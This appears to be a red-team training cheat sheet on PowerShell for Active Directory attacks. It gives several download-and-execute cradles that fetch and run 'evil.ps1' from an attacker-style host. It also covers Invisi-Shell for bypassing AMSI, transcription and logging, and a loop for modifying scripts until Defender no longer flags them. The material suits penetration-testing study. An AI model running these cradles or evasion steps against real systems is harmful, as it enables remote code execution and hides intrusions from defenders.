PowerShell
Loading a Module
• Load a PowerShell script using dot sourcing
. C:\AD\Tools\PowerView.ps1
• A module (or a script) can be imported with:
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1
• All the commands in a module can be listed with:
Get-Command -Module <modulename>
Script Execution
• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')
$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
Invisi-Shell
To bypass:
System-wide transcription
AMSI
System Block Logging
CLM
Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat
• With non-admin privileges:
RunWithRegistryNonAdmin.bat
• Type exit from the new PowerShell session to complete the clean-up.
Bypassing AV Signatures for Powershell
Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection.
To obfuscate entire script, use Invoke-Obfuscation.
AMSI Trigger
Steps to avoid signature based detection are pretty simple:
Scan using AMSITrigger
Modify the detected code snippet
Rescan using AMSITrigger
Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”
Simply provide path to the script file to scan it:
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
Last updated